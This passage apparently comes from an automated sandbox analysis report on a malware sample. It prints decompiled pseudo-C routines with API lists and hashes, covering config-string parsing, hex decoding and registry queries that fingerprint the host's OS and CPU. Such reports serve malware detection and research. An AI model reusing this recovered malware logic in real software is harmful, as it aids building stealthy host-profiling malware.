                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?), ref: 00412BAC
                                                                    • lstrcatA.KERNEL32(?), ref: 00412BBA
                                                                    • _memset.LIBCMT ref: 00412BC9
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00412BDF
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00412BF1
                                                                    • lstrcatA.KERNEL32(?), ref: 00412C04
                                                                    • GetFileAttributesW.KERNEL32(00000000,?,?,?), ref: 00412C63
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$_memset$AttributesFileFolderH_prolog3_Path
                                                                    • String ID:
                                                                    • API String ID: 1831167774-0
                                                                    • Opcode ID: cab01a1e6d47939782eea1689fca3bbf74bf115935c7c8798f5f1d7bc8c884a5
                                                                    • Instruction ID: 456868ecc7fe72aca583386d7c43b07fb5f78c5d0a1a51232e47ff6962ed81d3
                                                                    • Opcode Fuzzy Hash: cab01a1e6d47939782eea1689fca3bbf74bf115935c7c8798f5f1d7bc8c884a5
                                                                    • Instruction Fuzzy Hash: 1B51207280122CAEDF20EBA1DC89ADEB778AB09314F1045EAE509E3151DB759FC5CF58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 77%
                                                                    			E00409E88() {
                                                                    				signed int _v8;
                                                                    				char _v5012;
                                                                    				char _v10012;
                                                                    				char _v25012;
                                                                    				char _v75012;
                                                                    				char _v125012;
                                                                    				char _v125016;
                                                                    				char _v125020;
                                                                    				intOrPtr _v125024;
                                                                    				intOrPtr _v125028;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t36;
                                                                    				intOrPtr _t38;
                                                                    				char* _t39;
                                                                    				char* _t40;
                                                                    				char* _t41;
                                                                    				char* _t42;
                                                                    				char* _t43;
                                                                    				char* _t49;
                                                                    				void* _t52;
                                                                    				char* _t53;
                                                                    				CHAR* _t54;
                                                                    				void* _t58;
                                                                    				char* _t59;
                                                                    				void* _t60;
                                                                    				char* _t61;
                                                                    				void* _t62;
                                                                    				void* _t64;
                                                                    				signed int _t65;
                                                                    				char* _t67;
                                                                    				char _t73;
                                                                    				void* _t74;
                                                                    				void* _t75;
                                                                    				char _t76;
                                                                    				void* _t77;
                                                                    				intOrPtr _t78;
                                                                    				void* _t81;
                                                                    				void* _t82;
                                                                    				intOrPtr _t83;
                                                                    				void* _t85;
                                                                    				CHAR* _t92;
                                                                    				signed int _t93;
                                                                    				void* _t94;
                                                                    				void* _t95;
                                                                    
                                                                    				E0042E300(0x1e864);
                                                                    				_t36 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t36 ^ _t93;
                                                                    				_t38 =  *0x4461f0; // 0x0
                                                                    				_t87 =  *0x4461e0; // 0x0
                                                                    				_t88 = 0xc350;
                                                                    				_v125024 = _t38;
                                                                    				_t73 = 0xc350;
                                                                    				_t39 =  &_v75012;
                                                                    				do {
                                                                    					 *_t39 = 0;
                                                                    					_t39 = _t39 + 1;
                                                                    					_t73 = _t73 - 1;
                                                                    				} while (_t73 != 0);
                                                                    				_t74 = 0x1388;
                                                                    				_t40 =  &_v10012;
                                                                    				do {
                                                                    					 *_t40 = 0;
                                                                    					_t40 = _t40 + 1;
                                                                    					_t74 = _t74 - 1;
                                                                    				} while (_t74 != 0);
                                                                    				_t75 = 0x1388;
                                                                    				_t41 =  &_v5012;
                                                                    				do {
                                                                    					 *_t41 = 0;
                                                                    					_t41 = _t41 + 1;
                                                                    					_t75 = _t75 - 1;
                                                                    				} while (_t75 != 0);
                                                                    				_t76 = 0xc350;
                                                                    				_t42 =  &_v125012;
                                                                    				do {
                                                                    					 *_t42 = 0;
                                                                    					_t42 = _t42 + 1;
                                                                    					_t76 = _t76 - 1;
                                                                    				} while (_t76 != 0);
                                                                    				_t77 = 0x3a98;
                                                                    				_t43 =  &_v25012;
                                                                    				do {
                                                                    					 *_t43 = 0;
                                                                    					_t43 = _t43 + 1;
                                                                    					_t77 = _t77 - 1;
                                                                    				} while (_t77 != 0);
                                                                    				lstrcatA( &_v75012, _t87);
                                                                    				_t92 = E0041E87C(0, _t87, 0xc350,  &_v75012, ";",  &_v125020);
                                                                    				_t95 = _t94 + 0xc;
                                                                    				_v125016 = 1;
                                                                    				if(_t92 != 0) {
                                                                    					_t88 = _v125020;
                                                                    					do {
                                                                    						_t52 = _v125016 - 1;
                                                                    						if(_t52 == 0) {
                                                                    							_t81 = 0x1388;
                                                                    							_t53 =  &_v10012;
                                                                    							do {
                                                                    								 *_t53 = 0;
                                                                    								_t53 = _t53 + 1;
                                                                    								_t81 = _t81 - 1;
                                                                    							} while (_t81 != 0);
                                                                    							_t54 =  &_v10012;
                                                                    							goto L32;
                                                                    						} else {
                                                                    							_t58 = _t52 - 1;
                                                                    							if(_t58 == 0) {
                                                                    								_t82 = 0x1388;
                                                                    								_t59 =  &_v5012;
                                                                    								do {
                                                                    									 *_t59 = 0;
                                                                    									_t59 = _t59 + 1;
                                                                    									_t82 = _t82 - 1;
                                                                    								} while (_t82 != 0);
                                                                    								_t54 =  &_v5012;
                                                                    								goto L32;
                                                                    							} else {
                                                                    								_t60 = _t58 - 1;
                                                                    								if(_t60 == 0) {
                                                                    									_t83 = 0xc350;
                                                                    									_t61 =  &_v125012;
                                                                    									do {
                                                                    										 *_t61 = 0;
                                                                    										_t61 = _t61 + 1;
                                                                    										_t83 = _t83 - 1;
                                                                    									} while (_t83 != 0);
                                                                    									_t54 =  &_v125012;
                                                                    									L32:
                                                                    									lstrcatA(_t54, _t92);
                                                                    								} else {
                                                                    									_t62 = _t60 - 1;
                                                                    									if(_t62 == 0) {
                                                                    										_push(_t92);
                                                                    										_v125028 = E0041EA23();
                                                                    									} else {
                                                                    										_t64 = _t62 - 1;
                                                                    										if(_t64 == 0) {
                                                                    											_t65 =  *0x446458(_t92, "true");
                                                                    											asm("sbb edi, edi");
                                                                    											_t88 =  ~_t65 + 1;
                                                                    										} else {
                                                                    											if(_t64 == 1) {
                                                                    												_t85 = 0x3a98;
                                                                    												_t67 =  &_v25012;
                                                                    												do {
                                                                    													 *_t67 = 0;
                                                                    													_t67 = _t67 + 1;
                                                                    													_t85 = _t85 - 1;
                                                                    												} while (_t85 != 0);
                                                                    												lstrcatA( &_v25012, _t92);
                                                                    												_t87 =  &_v5012;
                                                                    												E00409ADF( &_v10012,  &_v5012, _v125028,  &_v125012, _t88, _t92, _v125024);
                                                                    												_t95 = _t95 + 0x14;
                                                                    												_v125016 = 0;
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						_v125016 = _v125016 + 1;
                                                                    						_t92 = E0041E87C(0, _t87, _t88, 0, ";",  &_v125020);
                                                                    						_t95 = _t95 + 0xc;
                                                                    					} while (_t92 != 0);
                                                                    				}
                                                                    				_t78 = 0xc350;
                                                                    				_t49 =  &_v75012;
                                                                    				do {
                                                                    					 *_t49 = 0;
                                                                    					_t49 = _t49 + 1;
                                                                    					_t78 = _t78 - 1;
                                                                    				} while (_t78 != 0);
                                                                    				return E0041DA9B(_t49, 0, _v8 ^ _t93, _t87, _t88, _t92);
                                                                    			}


















































                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _strtok_slstrcat
                                                                    • String ID: true
                                                                    • API String ID: 3150607157-4261170317
                                                                    • Opcode ID: de70d80f28d44038484b960b71a162ca22c95ffe38e6090770767b5173d637b5
                                                                    • Instruction ID: ab29309e79b87aa9ddf1a550bc7e0d759d8794b11dd3b590f3c75c699c02b645
                                                                    • Opcode Fuzzy Hash: de70d80f28d44038484b960b71a162ca22c95ffe38e6090770767b5173d637b5
                                                                    • Instruction Fuzzy Hash: 3F51933190025D8ADF24DB55CC54CEE77A8EF66345B4400FBE80AE72D1DE385E89CB6A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 92%
                                                                    			E0040482E(void* __eax, intOrPtr* __ebx, signed int __ecx, void* __edi, intOrPtr* __esi, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				intOrPtr _t29;
                                                                    				signed int _t30;
                                                                    				intOrPtr _t32;
                                                                    				signed int _t33;
                                                                    				intOrPtr _t35;
                                                                    				signed int _t36;
                                                                    				signed int _t39;
                                                                    				signed int _t41;
                                                                    				signed int _t42;
                                                                    				void* _t44;
                                                                    				intOrPtr _t45;
                                                                    				intOrPtr _t49;
                                                                    				intOrPtr* _t50;
                                                                    				intOrPtr* _t53;
                                                                    				intOrPtr* _t56;
                                                                    				intOrPtr* _t57;
                                                                    				intOrPtr _t63;
                                                                    				signed int _t66;
                                                                    				signed int _t67;
                                                                    				signed int _t71;
                                                                    				intOrPtr* _t75;
                                                                    				intOrPtr* _t76;
                                                                    				intOrPtr _t77;
                                                                    				intOrPtr _t78;
                                                                    				intOrPtr* _t79;
                                                                    				intOrPtr _t80;
                                                                    				void* _t82;
                                                                    				signed int _t85;
                                                                    				void* _t88;
                                                                    				void* _t90;
                                                                    
                                                                    				_t84 = __esi;
                                                                    				_t66 = __ecx;
                                                                    				_t60 = __ebx;
                                                                    				_t88 = _t90;
                                                                    				_push(__ecx);
                                                                    				_push(__edi);
                                                                    				_t82 = __eax;
                                                                    				_t29 =  *((intOrPtr*)(__ebx + 0x10));
                                                                    				if(_t29 < _a4) {
                                                                    					_t30 = E0041CFED("invalid string position");
                                                                    					asm("int3");
                                                                    					_push(__ebx);
                                                                    					_t61 = _v8;
                                                                    					_push(__esi);
                                                                    					_t85 = _t30;
                                                                    					_t67 = _t85;
                                                                    					if(E00404505(_t67, _v8) == 0) {
                                                                    						_t32 =  *((intOrPtr*)(_t85 + 0x10));
                                                                    						if((_t67 | 0xffffffff) - _t32 <= _t82) {
                                                                    							_t32 = E0041CFA0("string too long");
                                                                    						}
                                                                    						if(_t82 != 0) {
                                                                    							_t63 = _t32 + _t82;
                                                                    							if(E004044A3(_t63, _t85, _t82, _t88, _t63, 0) != 0) {
                                                                    								_t35 =  *((intOrPtr*)(_t85 + 0x14));
                                                                    								if(_t35 < 0x10) {
                                                                    									_t71 = _t85;
                                                                    								} else {
                                                                    									_t71 =  *_t85;
                                                                    								}
                                                                    								if(_t35 < 0x10) {
                                                                    									_t36 = _t85;
                                                                    								} else {
                                                                    									_t36 =  *_t85;
                                                                    								}
                                                                    								E0041DCF0(_t36 + _t82, _t71,  *((intOrPtr*)(_t85 + 0x10)));
                                                                    								if( *((intOrPtr*)(_t85 + 0x14)) < 0x10) {
                                                                    									_t39 = _t85;
                                                                    								} else {
                                                                    									_t39 =  *_t85;
                                                                    								}
                                                                    								E00420090(_t39, _v8, _t82);
                                                                    								 *((intOrPtr*)(_t85 + 0x10)) = _t63;
                                                                    								if( *((intOrPtr*)(_t85 + 0x14)) < 0x10) {
                                                                    									_t41 = _t85;
                                                                    								} else {
                                                                    									_t41 =  *_t85;
                                                                    								}
                                                                    								 *((char*)(_t41 + _t63)) = 0;
                                                                    							}
                                                                    						}
                                                                    						_t33 = _t85;
                                                                    					} else {
                                                                    						if( *((intOrPtr*)(_t85 + 0x14)) < 0x10) {
                                                                    							_t42 = _t85;
                                                                    						} else {
                                                                    							_t42 =  *_t85;
                                                                    						}
                                                                    						_t33 = E0040482E(_t82, _t85, _t67, _t82, _t85, _t61 - _t42);
                                                                    					}
                                                                    					return _t33;
                                                                    				} else {
                                                                    					_t44 = _t29 - _a4;
                                                                    					if(_t44 < __eax) {
                                                                    						_t82 = _t44;
                                                                    					}
                                                                    					_t45 =  *((intOrPtr*)(_t84 + 0x10));
                                                                    					if((_t66 | 0xffffffff) - _t45 <= _t82) {
                                                                    						_t45 = E0041CFA0("string too long");
                                                                    					}
                                                                    					if(_t82 != 0) {
                                                                    						_v8 = _t45 + _t82;
                                                                    						if(E004044A3(_t60, _t84, _t82, _t88, _t45 + _t82, 0) != 0) {
                                                                    							_t49 =  *((intOrPtr*)(_t84 + 0x14));
                                                                    							if(_t49 < 0x10) {
                                                                    								_t75 = _t84;
                                                                    							} else {
                                                                    								_t75 =  *_t84;
                                                                    							}
                                                                    							if(_t49 < 0x10) {
                                                                    								_t50 = _t84;
                                                                    							} else {
                                                                    								_t50 =  *_t84;
                                                                    							}
                                                                    							E0041DCF0(_t50 + _t82, _t75,  *((intOrPtr*)(_t84 + 0x10)));
                                                                    							if(_t84 != _t60) {
                                                                    								if( *((intOrPtr*)(_t60 + 0x14)) < 0x10) {
                                                                    									_t53 = _t60;
                                                                    								} else {
                                                                    									_t53 =  *_t60;
                                                                    								}
                                                                    								if( *((intOrPtr*)(_t84 + 0x14)) < 0x10) {
                                                                    									_t76 = _t84;
                                                                    								} else {
                                                                    									_t76 =  *_t84;
                                                                    								}
                                                                    								E00420090(_t76, _t53 + _a4, _t82);
                                                                    							} else {
                                                                    								_t80 = _a4;
                                                                    								if(_t80 != 0) {
                                                                    									_t80 = _t80 + _t82;
                                                                    								}
                                                                    								_t78 =  *((intOrPtr*)(_t84 + 0x14));
                                                                    								if(_t78 < 0x10) {
                                                                    									_t57 = _t84;
                                                                    								} else {
                                                                    									_t57 =  *_t84;
                                                                    								}
                                                                    								if(_t78 < 0x10) {
                                                                    									_t79 = _t84;
                                                                    								} else {
                                                                    									_t79 =  *_t84;
                                                                    								}
                                                                    								E0041DCF0(_t79, _t57 + _t80, _t82);
                                                                    							}
                                                                    							_t77 = _v8;
                                                                    							 *((intOrPtr*)(_t84 + 0x10)) = _t77;
                                                                    							if( *((intOrPtr*)(_t84 + 0x14)) < 0x10) {
                                                                    								_t56 = _t84;
                                                                    							} else {
                                                                    								_t56 =  *_t84;
                                                                    							}
                                                                    							 *((char*)(_t56 + _t77)) = 0;
                                                                    						}
                                                                    					}
                                                                    					return _t84;
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _memmove$Xinvalid_argumentstd::_
                                                                    • String ID: invalid string position$string too long
                                                                    • API String ID: 1771113911-4289949731
                                                                    • Opcode ID: fdf1746e18440054e3dbee6a8a20f800cd9884e385f5f1ca5fc8936b06fccb00
                                                                    • Instruction ID: 8cc0ea25ad7502a3dbebda752280076f74e667b351e9d4275c23165dc07a7114
                                                                    • Opcode Fuzzy Hash: fdf1746e18440054e3dbee6a8a20f800cd9884e385f5f1ca5fc8936b06fccb00
                                                                    • Instruction Fuzzy Hash: 6831B3F67002409BDA28EE6DC981A2BB3E6EBC17007244D3EE642A76C1D7389D41879D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 61%
                                                                    			E004112D0(void* __ebx, void** __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                    				char* _t31;
                                                                    				void* _t37;
                                                                    				void* _t42;
                                                                    				void* _t48;
                                                                    				intOrPtr* _t51;
                                                                    				signed int _t57;
                                                                    				long _t74;
                                                                    				void* _t77;
                                                                    
                                                                    				_push(0x5c);
                                                                    				E0042083E(E00433CA7, __ebx, __edi, __esi);
                                                                    				_t31 =  *(_t77 + 8);
                                                                    				_t76 = "0123456789ABCDEF";
                                                                    				_t74 = _t77 - 0x24;
                                                                    				asm("movsd");
                                                                    				asm("movsd");
                                                                    				asm("movsd");
                                                                    				asm("movsd");
                                                                    				 *(_t77 - 0x60) = __ecx;
                                                                    				_push(_t31);
                                                                    				 *(_t77 - 0x68) = _t31;
                                                                    				 *(_t77 - 0x64) =  *(_t77 + 0xc);
                                                                    				asm("movsb");
                                                                    				_t57 = 0;
                                                                    				if( *0x446320() > 0) {
                                                                    					_t76 =  *(_t77 - 0x68);
                                                                    					_t37 = E0041F240(_t77 - 0x24,  *_t76);
                                                                    					if(_t37 != 0) {
                                                                    						_t74 = _t37 - _t77 - 0x24 << 4;
                                                                    						_t42 = E0041F240(_t77 - 0x24, _t76[1]);
                                                                    						if(_t42 == 0) {
                                                                    							goto L2;
                                                                    						} else {
                                                                    							_t57 =  !(_t42 - _t77 - 0x00000024 + _t74 ^ 0xffffffa3) & 0x000000ff;
                                                                    							_t13 =  *0x446320(_t76) - 1; // -1
                                                                    							_t74 = _t13;
                                                                    							 *( *(_t77 - 0x64)) = _t74;
                                                                    							_t48 = HeapAlloc(GetProcessHeap(), 8, _t74);
                                                                    							 *( *(_t77 - 0x60)) = _t48;
                                                                    							if(_t48 == 0) {
                                                                    								goto L2;
                                                                    							} else {
                                                                    								 *(_t77 - 0x30) =  *(_t77 - 0x30) & 0x00000000;
                                                                    								 *((intOrPtr*)(_t77 - 0x2c)) = 0xf;
                                                                    								 *((char*)(_t77 - 0x40)) = 0;
                                                                    								E00404331(_t77 - 0x40, _t76);
                                                                    								 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
                                                                    								_t76 = _t77 - 0x5c;
                                                                    								_t51 = E0040C034(_t77 - 0x40, _t77 - 0x5c, _t77 - 0x40, 2, 0xffffffff);
                                                                    								if( *((intOrPtr*)(_t51 + 0x14)) >= 0x10) {
                                                                    									_t51 =  *_t51;
                                                                    								}
                                                                    								E0041E192( *( *(_t77 - 0x60)), _t74, _t51);
                                                                    								E00404354(_t77 - 0x5c, 1, 0);
                                                                    								E00404354(_t77 - 0x40, 1, 0);
                                                                    								goto L8;
                                                                    							}
                                                                    						}
                                                                    					} else {
                                                                    						L2:
                                                                    					}
                                                                    				}
                                                                    				return E00420888(_t57, _t74, _t76);
                                                                    			}

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 004112D7
                                                                    • lstrlen.KERNEL32(?,0000005C,00411449,?,?,00000024), ref: 004112FB
                                                                    • lstrlen.KERNEL32(?,?,?,00000024), ref: 00411357
                                                                    • GetProcessHeap.KERNEL32(00000008,-00000001,?,?,00000024), ref: 00411368
                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000024), ref: 0041136F
                                                                    • _strcpy_s.LIBCMT ref: 004113B9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heaplstrlen$AllocH_prolog3_Process_strcpy_s
                                                                    • String ID: 0123456789ABCDEF
                                                                    • API String ID: 2514983032-2554083253
                                                                    • Opcode ID: 0c81044fe54157c0374c53d8f96f4fe9bfc3e1af1748c0dd9a59fe43b728177d
                                                                    • Instruction ID: 030344be54a23f71540a0a79728bca2daea75cc8dc98f352f0a43ebfd85a459b
                                                                    • Opcode Fuzzy Hash: 0c81044fe54157c0374c53d8f96f4fe9bfc3e1af1748c0dd9a59fe43b728177d
                                                                    • Instruction Fuzzy Hash: F031C0719003099FEB04EFA5DC45BDE77B8AF0A304F10002AFA15EB291DB79A948CB58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 85%
                                                                    			E004148DC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				intOrPtr _t19;
                                                                    				void* _t24;
                                                                    				intOrPtr _t39;
                                                                    				void* _t44;
                                                                    
                                                                    				_push(0x14);
                                                                    				E004207D5(E004338D8, __ebx, __edi, __esi);
                                                                    				E0041D5BD(_t44 - 0x14, 0);
                                                                    				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
                                                                    				_t39 =  *0x446724; // 0x4be10a0
                                                                    				 *((intOrPtr*)(_t44 - 0x10)) = _t39;
                                                                    				_t19 = E0040E116( *((intOrPtr*)(_t44 + 8)), E0040E063(_t44 - 0x14, 0x444ae8));
                                                                    				_t43 = _t19;
                                                                    				if(_t19 == 0) {
                                                                    					if(_t39 == 0) {
                                                                    						_push( *((intOrPtr*)(_t44 + 8)));
                                                                    						_push(_t44 - 0x10);
                                                                    						_t24 = E0040E14B(__ebx, _t39, _t43, __eflags);
                                                                    						__eflags = _t24 - 0xffffffff;
                                                                    						if(_t24 == 0xffffffff) {
                                                                    							E0041DC67(_t44 - 0x20, "bad cast");
                                                                    							E0041FF86(_t44 - 0x20, 0x440cfc);
                                                                    						}
                                                                    						_t43 =  *((intOrPtr*)(_t44 - 0x10));
                                                                    						 *0x446724 =  *((intOrPtr*)(_t44 - 0x10));
                                                                    						E0040E094( *((intOrPtr*)(_t44 - 0x10)));
                                                                    						E0041D21C(__eflags, _t43);
                                                                    					} else {
                                                                    						_t43 = _t39;
                                                                    					}
                                                                    				}
                                                                    				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
                                                                    				E0041D5E5(_t44 - 0x14);
                                                                    				return E00420874(_t43);
                                                                    			}







                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 004148E3
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004148ED
                                                                      • Part of subcall function 0040E063: std::_Lockit::_Lockit.LIBCPMT ref: 0040E071
                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0041493C
                                                                    • __CxxThrowException@8.LIBCMT ref: 0041494A
                                                                    • std::locale::facet::_Incref.LIBCPMT ref: 0041495A
                                                                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 00414960
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
                                                                    • String ID: bad cast
                                                                    • API String ID: 158301680-3145022300
                                                                    • Opcode ID: 391bde52492a83ac6010bf03c4688ecf07c6551cc5cb3b4c4126b02a386acfdf
                                                                    • Instruction ID: 2eeb985915207f491d29b51f0ec2b0032bc232cb8e531018501302300e531e97
                                                                    • Opcode Fuzzy Hash: 391bde52492a83ac6010bf03c4688ecf07c6551cc5cb3b4c4126b02a386acfdf
                                                                    • Instruction Fuzzy Hash: 4E01CEB1D4022497CB00EB71C842AEE73A0AB84728F20066BE410B72D1EB7C9E4187CD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 85%
                                                                    			E0041527A(void* __edi, void* __esi) {
                                                                    				void* __ebx;
                                                                    				signed int _t15;
                                                                    				void* _t32;
                                                                    				void* _t35;
                                                                    				void* _t36;
                                                                    				void* _t37;
                                                                    				signed int _t38;
                                                                    				void* _t40;
                                                                    
                                                                    				_t37 = __esi;
                                                                    				_t36 = __edi;
                                                                    				_t38 = _t40 - 0x18c;
                                                                    				_t15 =  *0x443674; // 0x393162b1
                                                                    				 *(_t38 + 0x188) = _t15 ^ _t38;
                                                                    				 *(_t38 - 0x80) = 0xff;
                                                                    				 *(_t38 + 0x88) = 0;
                                                                    				E00426300(_t38 + 0x89, 0, 0xfe);
                                                                    				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x20119, _t38 - 0x7c) == 0) {
                                                                    					RegQueryValueExA( *(_t38 - 0x7c), "ProductName", 0, 0, _t38 + 0x88, _t38 - 0x80);
                                                                    				}
                                                                    				RegCloseKey( *(_t38 - 0x7c));
                                                                    				CharToOemA(_t38 + 0x88, _t38 - 0x78);
                                                                    				_pop(_t32);
                                                                    				return E0041DA9B(_t38 - 0x78, _t32,  *(_t38 + 0x188) ^ _t38, _t35, _t36, _t37);
                                                                    			}











                                                                    APIs
                                                                    • _memset.LIBCMT ref: 004152B2
                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,?,?,00000001), ref: 004152CE
                                                                    • RegQueryValueExA.ADVAPI32(?,ProductName,00000000,00000000,?,?,?,?,00000001), ref: 004152ED
                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000001), ref: 004152F6
                                                                    • CharToOemA.USER32(?,?), ref: 00415307
                                                                    Strings
                                                                    • ProductName, xrefs: 004152E5
                                                                    • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004152C4
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CharCloseOpenQueryValue_memset
                                                                    • String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                    • API String ID: 2235053359-1787575317
                                                                    • Opcode ID: afc4507dc89cf82fe62f1f22f56d1c040bf5a00c27ae694bebb319ef339ab5c0
                                                                    • Instruction ID: 4ec4cb7fb1befc7b243c6ab37bf2e476659b43eeef9c87b2870427e474bfdd8b
                                                                    • Opcode Fuzzy Hash: afc4507dc89cf82fe62f1f22f56d1c040bf5a00c27ae694bebb319ef339ab5c0
                                                                    • Instruction Fuzzy Hash: A81130B190014CAEDB30EFA0EC85FEE77ACAB19304F50802AB919D6152EF745A4C8B14
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 85%
                                                                    			E00414F5B(void* __edi, void* __esi) {
                                                                    				void* __ebx;
                                                                    				signed int _t15;
                                                                    				void* _t32;
                                                                    				void* _t35;
                                                                    				void* _t36;
                                                                    				void* _t37;
                                                                    				signed int _t38;
                                                                    				void* _t40;
                                                                    
                                                                    				_t37 = __esi;
                                                                    				_t36 = __edi;
                                                                    				_t38 = _t40 - 0x18c;
                                                                    				_t15 =  *0x443674; // 0x393162b1
                                                                    				 *(_t38 + 0x188) = _t15 ^ _t38;
                                                                    				 *(_t38 - 0x80) = 0xff;
                                                                    				 *(_t38 + 0x88) = 0;
                                                                    				E00426300(_t38 + 0x89, 0, 0xfe);
                                                                    				if(RegOpenKeyExA(0x80000002, "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", 0, 0x20119, _t38 - 0x7c) == 0) {
                                                                    					RegQueryValueExA( *(_t38 - 0x7c), "ProcessorNameString", 0, 0, _t38 + 0x88, _t38 - 0x80);
                                                                    				}
                                                                    				RegCloseKey( *(_t38 - 0x7c));
                                                                    				CharToOemA(_t38 + 0x88, _t38 - 0x78);
                                                                    				_pop(_t32);
                                                                    				return E0041DA9B(_t38 - 0x78, _t32,  *(_t38 + 0x188) ^ _t38, _t35, _t36, _t37);
                                                                    			}











                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00414F93
                                                                    • RegOpenKeyExA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?,?,?,00000000), ref: 00414FAF
                                                                    • RegQueryValueExA.ADVAPI32(?,ProcessorNameString,00000000,00000000,?,?,?,?,00000000), ref: 00414FCE
                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00414FD7
                                                                    • CharToOemA.USER32(?,?), ref: 00414FE8
                                                                    Strings
                                                                    • ProcessorNameString, xrefs: 00414FC6
                                                                    • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 00414FA5
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CharCloseOpenQueryValue_memset
                                                                    • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
                                                                    • API String ID: 2235053359-2804670039
                                                                    • Opcode ID: 6d7e922951126200fdd4c221a31543a53e9b49f9e0addd1b7ffd6bc123c9b53e
                                                                    • Instruction ID: 36636f6957cfb15491d970b2bb69a6a55df0de48c7cde731a852b8320a3d0e85
                                                                    • Opcode Fuzzy Hash: 6d7e922951126200fdd4c221a31543a53e9b49f9e0addd1b7ffd6bc123c9b53e
                                                                    • Instruction Fuzzy Hash: DC1130B190014CAEDB30DFA0EC85FEE776CAB09308F50803AB919D6152EF745A4C8B55
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E004151AA(void* __ebx, void* __esi) {
                                                                    				signed int _v8;
                                                                    				unsigned int _v64;
                                                                    				signed int _v68;
                                                                    				char _v76;
                                                                    				void* __edi;
                                                                    				signed int _t12;
                                                                    				struct _MEMORYSTATUSEX* _t18;
                                                                    				unsigned int _t19;
                                                                    				unsigned int _t23;
                                                                    				void* _t24;
                                                                    				signed int _t25;
                                                                    				void* _t29;
                                                                    				CHAR* _t30;
                                                                    				void* _t31;
